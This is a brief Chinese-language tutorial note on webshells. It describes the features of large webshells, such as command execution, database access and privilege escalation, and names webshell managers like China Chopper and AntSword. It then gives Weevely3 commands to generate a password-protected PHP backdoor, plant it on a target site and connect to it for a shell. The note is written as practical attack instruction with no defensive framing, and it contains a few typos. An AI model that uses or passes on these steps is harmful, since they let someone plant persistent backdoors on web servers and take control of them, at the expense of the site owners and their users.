大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。
Webshell管理工具的介绍和使用:
Webshell工具主要和一句话配合使用
中国菜刀、中国蚁剑等
Weevely3生成网页木马(基于python)
python weevely.py -h
python weevely.py generate cmd ./backdoor.php (cmd是密码)将产生的webshell投放到目标站点中
这样就制作出了cmd为密码的后门php
weevely.py http://127.0.0.1/backdoor.php cmd就能进入后门,得到shell